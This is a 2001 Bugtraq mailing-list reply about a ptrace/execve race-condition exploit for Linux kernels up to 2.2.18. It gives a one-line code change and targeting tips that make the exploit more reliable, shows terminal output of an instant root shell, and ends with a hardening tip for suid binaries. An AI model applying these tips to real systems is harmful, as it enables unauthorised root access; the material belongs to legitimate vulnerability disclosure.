[19957] in bugtraq
Re: ptrace/execve race condition exploit (non brute-force)
daemon@ATHENA.MIT.EDU (Paul Starzetz)
Fri Mar 30 12:19:30 2001
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <3AC49057.7CEEA66C@starzetz.de>
Date: Fri, 30 Mar 2001 15:55:35 +0200
Reply-To: Paul Starzetz <paul@STARZETZ.DE>
From: Paul Starzetz <paul@STARZETZ.DE>
X-To: Mariusz Woloszyn <emsi@IPARTNERS.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Mariusz Woloszyn wrote:
>
> On Tue, 27 Mar 2001, Wojciech Purczynski wrote:
>
> >
> > Hi,
> >
> > Here is exploit for ptrace/execve race condition bug in Linux kernels up
> > to 2.2.18.
> >
>
> Hi!
>
> I've seen a tool that works better than this, useing different aproach to
> the same bug explits it on all platforms giving instant root without the
> need for cat garbage files to clear disk cache!!!
Even with the original exploit code there is a 99.99% chance to gain root access, if you change the
line:
regs.eip=eip;
to:
regs.eip=regs.esp;
and don't call objdump on the targetted binary before (use only the binary name as argument to
epcs). At least with 'exotic' suid binaries like uux or gpasswd which are *never* in the disk cache
you will get instant root too.
paul@ps:/usr/home/paul/tmp2 > ./epcs /usr/bin/gpasswd
Bug exploited successfully.
sh-2.04# id
uid=0(root) gid=0(root) groups=100(users)
sh-2.04#
Clever admins would chmod 4511 their suid binaries.
Ihq.
